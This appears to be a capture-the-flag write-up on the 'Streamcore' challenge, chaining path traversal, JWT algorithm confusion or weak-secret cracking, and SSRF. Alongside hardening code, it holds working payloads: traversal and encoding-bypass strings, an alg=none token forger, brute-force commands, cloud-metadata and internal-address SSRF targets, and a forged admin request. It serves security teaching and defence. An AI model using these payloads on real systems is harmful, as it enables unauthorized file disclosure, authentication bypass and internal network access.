StreamCore CTF Unlocked: How Chaining Path Traversal, JWT Algorithm Confusion, and SSRF Turns a Video Player into a Total System Compromise + Video

Introduction:

The YesWeHack Dojo’s latest Capture The Flag (CTF) challenge, “Streamcore,” simulates a sleek video streaming service with a deceptively simple interface. Beneath the surface, however, lies a sophisticated attack chain that forces ethical hackers to weaponize three distinct vulnerability classes—Path Traversal, JWT Algorithm Confusion, and Server-Side Request Forgery (SSRF)—in a single, coordinated exploit. This article dissects the technical path to compromise, providing a hands-on guide to identifying and exploiting these weaknesses while teaching essential defensive strategies for modern web applications.

Learning Objectives:

  • Objective 1: Understand and exploit Path Traversal vulnerabilities in file-loading functionalities to read sensitive source code.
  • Objective 2: Analyze and forge JSON Web Tokens (JWTs) by exploiting weak signing algorithms (e.g., none) or brute-forcing weak HMAC secrets.
  • Objective 3: Master Server-Side Request Forgery (SSRF) attacks to pivot from a video stream processor to internal network services and exfiltrate the flag.

You Should Know:

1. Mapping the Attack Surface: From Video Player to Local File Disclosure

The CTF presents a video streaming service that loads media files using a parameter in the URL, such as `https://streamcore.ctf/load?file=video.mp4`. The first critical step is testing for a Path Traversal vulnerability, which allows an attacker to read arbitrary files from the server’s filesystem. If the application does not properly sanitize the `file` parameter, an attacker can use sequences like `../` (dot-dot-slash) to move up directories and access sensitive files, such as the application’s source code or configuration files.

Step‑by‑Step Exploitation Guide:

  1. Identify the File-Loading Endpoint: Intercept the request when loading a video using a proxy like Burp Suite or OWASP ZAP. Look for parameters named `file`, `path`, `document`, `load`, or `stream`.
  2. Inject Path Traversal Payloads: Send crafted payloads to the endpoint to read the application’s source code, typically `app.js`, `index.php`, or `server.py`.

```bash
# Linux/macOS payload
curl -k "https://streamcore.ctf/load?file=../../../../app.py"

# Windows payload (if the server is Windows-based)
curl -k "https://streamcore.ctf/load?file=..\..\..\..\Windows\win.ini"
```

  3. Bypass Common Defenses: If simple traversal is blocked, try:

– URL Encoding: `%2e%2e%2f` for `../`
– Double URL Encoding: `%252e%252e%252f`
– Absolute Paths: `file:///etc/passwd`
– Null Byte Injection (legacy): `../../../etc/passwd%00.jpg`

  4. Analyze the Leaked Source Code: After successfully reading a file like `server.py` or `auth.js`, search for hardcoded credentials, API keys, or—most critically—the token generation logic. This often reveals how the application creates and validates JWTs. In the Streamcore CTF, this initial traversal exposes the token generation mechanism, showing that the server uses a weak, guessable secret for its JWTs.

2. Breaking the Bearer: JWT Algorithm Confusion and Secret Brute-Forcing

Once the source code is obtained, the next phase involves manipulating the JSON Web Token (JWT) used for authentication or authorization. A common misconfiguration is accepting the `none` algorithm or using a weak HMAC secret.

Step‑by‑Step JWT Exploitation Guide:

  1. Extract and Decode the JWT: Locate the token in the `Authorization` header or a cookie. Use `jwt_tool` or the online debugger (jwt.io) to decode its payload.

```bash
# Using jwt_tool to decode and analyze a token
python3 jwt_tool.py <JWT_TOKEN>
```

  2. Check for the `none` Algorithm Vulnerability: Tamper with the token’s header, changing the `alg` field to `none` and removing the signature part. If the server honours the algorithm named in the header, it accepts the modified token.

```python
# Python snippet (PyJWT) to create a 'none' algorithm token
import jwt

token = jwt.encode({"user": "admin", "role": "admin"}, key="", algorithm="none")
print(token)
```

  3. Brute-Force a Weak HMAC Secret: If the algorithm is HS256, use a tool like `hashcat` or `john` to crack the secret from a valid token-signature pair.

```bash
# Using jwt_tool to brute-force the secret with a wordlist
python3 jwt_tool.py <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
```

  4. Forge an Administrative Token: Once you have the secret or confirm the `none` vulnerability, craft a new token with elevated privileges (e.g., changing `role` to `admin`). Send this forged token in a new request to access an internal administrative endpoint, such as `/admin/debug`, disclosed in the leaked source code.

3. Pivoting with SSRF: Streaming Your Way to Internal Endpoints

With an admin JWT, the CTF reveals a new function: a `stream_debug` endpoint that allows the user to provide a URL for the server to fetch and process. This is a classic Server-Side Request Forgery (SSRF) vulnerability. The goal is to abuse this privileged service to interact with internal infrastructure.

Step‑by‑Step SSRF Exploitation Guide:

  1. Locate the SSRF Primitives: After authentication with the forged token, navigate to functions like “Import from URL,” “Fetch Metadata,” or any feature that instructs the server to download a resource from a user-supplied address.
  2. Probe the Internal Network: Start by having the server fetch a URL you control to confirm connectivity (e.g., `https://your-server.com/callback`). Then, scan for internal IP addresses and ports.

```text
# Common internal addresses to test for SSRF
http://127.0.0.1:80
http://127.0.0.1:8080
http://169.254.169.254/latest/meta-data/   # cloud metadata
http://192.168.1.1/config
```

  3. Bypass Allowlist Restrictions: If the server uses a basic allowlist, bypass it using techniques like:

– Redirects: Host a server that redirects to `http://127.0.0.1/admin`.
– DNS Rebinding: Point a domain to a public IP, then switch it to an internal IP.
– Alternative Representations: Use `http://0.0.0.0` or `http://localhost` instead of `127.0.0.1`. Also try `http://2130706433/` (decimal for 127.0.0.1).

  4. Read the Flag: The internal service the CTF protects is likely a simple HTTP server on `localhost:8080` that requires a specific `X-Internal-API-Key` header. The forged JWT might have already granted you that key. Use the SSRF to request the flag endpoint.

```http
POST /stream_debug HTTP/1.1
Host: streamcore.ctf
Authorization: Bearer <FORGED_ADMIN_TOKEN>
Content-Type: application/json

{"url": "http://127.0.0.1:8080/admin/flag"}
```

By successfully chaining the path traversal, JWT attack, and SSRF, the flag is exfiltrated via the server’s own request to itself, completely bypassing external access controls.

4. Hardening Against the Chain: Defensive Strategies

Understanding the attack chain is the first step; building resilient defenses is the ultimate goal. Here are key mitigations for each stage:

  • Path Traversal Prevention:
    – Use a secure, allowlist-based approach for file access. Never trust user-supplied input for file paths.
    – Store files outside the web root and reference them by a database ID or a randomly generated filename, not the original path.
    – Implement strict input validation and sanitization, rejecting sequences like `../`, `..\`, or their encoded variants.
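The `?file=` loader from section 1 beside one that applies the containment check these bullets call for. This is an added example, not code from the Streamcore CTF, YesWeHack or Undercode; the media directory, `video.mp4` and the `server.py` holding a secret are constructed in a temp directory so it runs offline.

```python
import os
import tempfile
from urllib.parse import unquote

# Constructed sandbox: a media directory holding one video, and a server.py
# one level above it standing in for the source code the CTF leaks.
ROOT = tempfile.mkdtemp()
MEDIA_DIR = os.path.join(ROOT, "media")
os.makedirs(MEDIA_DIR)
with open(os.path.join(MEDIA_DIR, "video.mp4"), "wb") as f:
    f.write(b"constructed video bytes")
with open(os.path.join(ROOT, "server.py"), "w") as f:
    f.write("JWT_SECRET = 'constructed-weak-secret'\n")


def load_vulnerable(file_param: str) -> bytes:
    """The pattern behind ?file=: decode, join with the media dir, read.
    Nothing checks that the result is still inside MEDIA_DIR."""
    with open(os.path.join(MEDIA_DIR, unquote(file_param)), "rb") as f:
        return f.read()


def load_hardened(file_param: str) -> bytes:
    """Containment check: fully decode, then require the *resolved* path
    to stay under MEDIA_DIR. Catches ../, ..\\, %2e%2e%2f, %252e%252e%252f,
    absolute paths and the legacy %00 trick listed in section 1."""
    name = file_param
    for _ in range(3):              # decode until stable (double encoding)
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    name = name.replace("\\", "/")  # treat backslash as a separator too
    if "\x00" in name:
        raise PermissionError("NUL byte in filename")
    base = os.path.realpath(MEDIA_DIR)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes media directory")
    with open(target, "rb") as f:
        return f.read()


def is_rejected(file_param: str) -> bool:
    """True when the hardened loader refuses the request."""
    try:
        load_hardened(file_param)
    except PermissionError:
        return True
    return False
```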

  • JWT Hardening:
    – Never accept the `none` algorithm in production. Explicitly configure your JWT library to reject it.
    – Use strong, randomly generated secrets for HMAC signatures (HS256). Consider using asymmetric algorithms like RS256 or ES256, where the private key never leaves the server.
    – Implement short-lived tokens and use refresh tokens to reduce the window of opportunity for an attacker.
    – Validate the `iss` (issuer) and `aud` (audience) claims to prevent token misuse across different services.
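A verifier that trusts the header’s `alg` (the weakness section 2 exploits with the `none` token) beside one that pins HS256, compares in constant time and checks `iss`, as these bullets require. Added example built on the standard library only, not code from the CTF or from any JWT library; `SECRET` and the `streamcore` issuer are constructed values.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; a real one is 32+ bytes from secrets.token_bytes().
SECRET = b"constructed-demo-secret-do-not-deploy-anywhere"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    head = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims).encode())
    mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{_b64url(mac)}"


def none_token(claims: dict) -> str:
    """The alg=none token from section 2: header says none, signature empty."""
    head = _b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{head}.{_b64url(json.dumps(claims).encode())}."


def verify_vulnerable(token: str, secret: bytes) -> Optional[dict]:
    """Lets the attacker-controlled header choose the algorithm."""
    head, body, sig = token.split(".")
    if json.loads(_unb64url(head)).get("alg") == "none":
        return json.loads(_unb64url(body))       # no signature needed
    mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return json.loads(_unb64url(body)) if mac == _unb64url(sig) else None


def verify_hardened(token: str, secret: bytes, issuer: str) -> Optional[dict]:
    """Pins HS256 whatever the header says, compares the MAC in constant
    time and rejects tokens minted for another issuer."""
    try:
        head, body, sig = token.split(".")
        alg = json.loads(_unb64url(head)).get("alg")
    except ValueError:                            # malformed token
        return None
    if alg != "HS256":
        return None
    mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(mac, _unb64url(sig)):
        return None
    claims = json.loads(_unb64url(body))
    return claims if claims.get("iss") == issuer else None
```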

  • SSRF Mitigation:
    – Implement a strict allowlist of allowed URLs or IP addresses for any outbound requests initiated by user input.
    – Use a dedicated HTTP client that prevents redirects to internal IPs.
    – Run internal services on non-standard ports and require mutual TLS (mTLS) authentication for service-to-service communication.
    – Isolate the component that makes outbound requests in a restricted network segment with no access to sensitive internal resources.
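A destination check for the `stream_debug` style fetcher from section 3, covering the alternative spellings listed there (`0.0.0.0`, `localhost`, decimal `2130706433`), the metadata address, IPv4-mapped IPv6 and rebinding names that resolve to several addresses. Added example, not the CTF’s code; `default_resolver` uses real DNS, and the resolver parameter exists so the name cases can be checked offline with a stand-in.

```python
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlparse

# Ranges an outbound fetcher must never reach: loopback, "this host",
# RFC 1918, link-local (cloud metadata at 169.254.169.254) and IPv6 kin.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "0.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

Resolver = Callable[[str], List[str]]


def default_resolver(host: str) -> List[str]:
    """Every address a name resolves to, so a rebinding name cannot hide one."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def candidate_addresses(host: str, resolver: Resolver) -> List[str]:
    """IPv4 literals go through inet_aton first, which normalises the
    alternative spellings from section 3 (2130706433, 127.1, 0.0.0.0)
    without touching DNS; IPv6 literals via ipaddress; names via resolver."""
    try:
        return [socket.inet_ntoa(socket.inet_aton(host))]
    except OSError:
        pass
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return resolver(host)


def is_allowed_target(url: str, resolver: Resolver = default_resolver) -> bool:
    """Allowlist gate for a user-supplied fetch URL. Re-run it on every
    redirect Location the client is about to follow, not only the first URL."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False                     # no file://, gopher://, dict:// ...
    addrs = candidate_addresses(parsed.hostname, resolver)
    if not addrs:
        return False
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 is still loopback
        if any(ip in net for net in BLOCKED_NETS):
            return False
    return True
```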

5. Essential Tools for the Ethical Hacker’s Arsenal

To effectively discover and exploit such chains, a well-equipped toolkit is essential. Here are some recommended tools and their primary use cases:

  • Burp Suite / OWASP ZAP: Intercepting proxies for traffic analysis, parameter manipulation, and automated scanning.
  • jwt_tool: A comprehensive toolkit for testing, analyzing, and forging JWTs.
  • hashcat / John the Ripper: Password cracking tools essential for brute-forcing weak JWT secrets.
  • Nuclei: A fast, template-based vulnerability scanner ideal for automating the detection of known vulnerabilities, including misconfigurations in JWT and SSRF.
  • ffuf / gobuster: Fuzzing tools for discovering hidden endpoints, directories, and parameters.

What Undercode Say:

  • Key Takeaway 1: Modern CTF chains are not about single, isolated bugs but about the creative interconnection of multiple small misconfigurations, each acting as a link in a larger kill chain.
  • Key Takeaway 2: Defenders must adopt an “assume breach” mentality and implement defense-in-depth; a path traversal bug should not lead to a JWT secret, and an SSRF primitive should never be placed in an admin-only function without rigorous allowlisting and network segmentation.

Analysis: This CTF brilliantly mirrors real-world attack paths observed in complex web applications. The progression from information disclosure (path traversal) to privilege escalation (JWT manipulation) to internal network pivoting (SSRF) is a textbook example of how seemingly low-severity issues accumulate into a critical compromise. The ultimate lesson is that each layer of security must be independent. Using a weak JWT secret nullifies authentication, and exposing internal debugging functions behind a compromised token nullifies network isolation. This demonstrates a core principle: isolation and secrets are only as strong as the weakest link in their implementation chain.

Prediction:

  • -1 As AI-assisted coding becomes mainstream, the prevalence of hardcoded secrets and weak algorithm support in JWT libraries may temporarily increase, as developers rely on auto-complete without security context, leading to a resurgence of these specific vulnerability chains.
  • +1 The growing maturity of automated API security testing tools (e.g., Burp Suite’s BChecks, custom Nuclei templates) will soon make the detection of complex, multi-stage chains like “Path Traversal -> JWT Weakness -> SSRF” a standard CI/CD gate, drastically reducing their presence in production environments.

Reported By: Our Dojo – Hackers Feeds